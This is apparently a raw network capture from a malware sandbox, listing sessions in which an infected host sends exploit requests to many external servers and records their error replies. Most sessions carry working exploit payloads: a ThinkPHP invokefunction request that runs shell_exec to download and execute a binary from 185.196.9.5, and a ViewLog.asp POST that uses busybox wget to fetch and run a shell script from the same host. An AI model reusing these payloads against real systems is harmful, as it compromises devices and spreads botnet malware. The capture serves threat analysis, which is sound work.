Feb 25, 2024 19:05:00.406631947 CET	259	IN	HTTP/1.1 501 Not Implemented Connection: Keep-Alive Content-Length: 121 Date: Sun, 25 Feb 2024 18:04:46 GMT Expires: 0 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error 501: Not Implemented</title></head><body><h1>Error 501: Not Implemented</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1030	192.168.2.15	43930	95.128.135.234	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:59.150054932 CET	199	IN	HTTP/1.0 400 Bad request Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1031	192.168.2.15	34206	95.100.11.8	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:59.200934887 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:59.589653969 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:04:59 GMT Date: Sun, 25 Feb 2024 18:04:59 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 66 37 32 32 63 33 31 26 23 34 36 3b 31 37 30 38 38 38 34 32 39 39 26 23 34 36 3b 31 36 36 30 65 34 39 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.6f722c31.1708884299.1660e49f</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1032	192.168.2.15	48558	85.214.172.235	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:59.332089901 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:59.523865938 CET	937	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 741 Date: Sun, 25 Feb 2024 18:04:59 GMT Keep-Alive: timeout=20 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 33 31 20 28 55 62 75 6e 74 75 29 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> /cgi-bin/ViewLog.asp</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.31 (Ubuntu)</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1033	192.168.2.15	40324	85.94.179.79	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:59.340151072 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:59.539486885 CET	304	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:59 GMT Server: Apache Content-Length: 126 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1034	192.168.2.15	47256	31.200.57.71	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:59.372359037 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1035	192.168.2.15	54752	62.29.0.16	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:59.375257015 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1036	192.168.2.15	41484	95.101.107.201	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:02.793792009 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:03.003664017 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:05:02 GMT Date: Sun, 25 Feb 2024 18:05:02 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 37 38 31 30 30 32 26 23 34 36 3b 31 37 30 38 38 38 34 33 30 32 26 23 34 36 3b 31 31 33 31 62 38 39 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.6781002.1708884302.1131b89d</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1037	192.168.2.15	43434	31.136.4.145	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:02.811403990 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:06.020965099 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:12.164859056 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:24.196842909 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1038	192.168.2.15	45340	85.221.248.78	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:02.834630013 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1039	192.168.2.15	51396	85.225.61.187	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:02.838376999 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1040	192.168.2.15	55562	94.123.53.134	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:02.854866982 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1041	192.168.2.15	43312	94.255.163.184	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:03.037482977 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:03.242244005 CET	561	IN	HTTP/1.1 404 Not Found Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Content-Type Content-Type: text/html Content-Length: 345 Date: Sun, 25 Feb 2024 18:05:01 GMT Server: WebServer Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1042	192.168.2.15	38210	94.122.192.1	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:03.059726954 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1043	192.168.2.15	60650	88.221.77.210	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:03.218636990 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:03.435992002 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:05:03 GMT Date: Sun, 25 Feb 2024 18:05:03 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 35 65 36 36 35 35 66 26 23 34 36 3b 31 37 30 38 38 38 34 33 30 33 26 23 34 36 3b 31 39 61 65 33 35 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.95e6655f.1708884303.19ae351</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1044	192.168.2.15	59738	95.216.15.199	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:03.786504030 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:03.985426903 CET	355	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sun, 25 Feb 2024 17:34:21 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1045	192.168.2.15	43886	31.136.234.57	8080

Timestamp	Bytes transferred	Direction	Data
